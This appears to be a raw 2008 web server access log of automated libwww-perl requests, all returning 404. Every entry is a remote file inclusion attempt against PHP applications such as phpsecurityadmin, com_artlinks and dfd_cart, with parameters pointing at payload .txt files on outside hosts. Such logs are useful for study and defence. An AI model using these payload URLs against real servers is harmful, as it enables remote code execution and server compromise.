212.34.140.215 - - [12/Jun/2008:10:52:20 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
77.55.90.2 - - [12/Jun/2008:10:54:55 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://gbof.ca/images/id2.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.64"
77.55.90.2 - - [12/Jun/2008:10:54:56 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://gbof.ca/images/id2.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.64"
72.55.153.109 - - [12/Jun/2008:11:08:24 -0500] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
72.55.153.109 - - [12/Jun/2008:11:08:24 -0500] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
74.52.114.58 - - [12/Jun/2008:11:10:40 -0500] "GET /logs/errors.php?eror=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
74.52.114.58 - - [12/Jun/2008:11:10:40 -0500] "GET /errors.php?eror=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
89.149.241.207 - - [12/Jun/2008:11:14:54 -0500] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.811"
89.149.241.207 - - [12/Jun/2008:11:14:54 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 366 "-""libwww-perl/5.811"
72.36.222.34 - - [12/Jun/2008:11:28:05 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:11:28:06 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:11:35:57 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
72.36.222.34 - - [12/Jun/2008:11:35:57 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
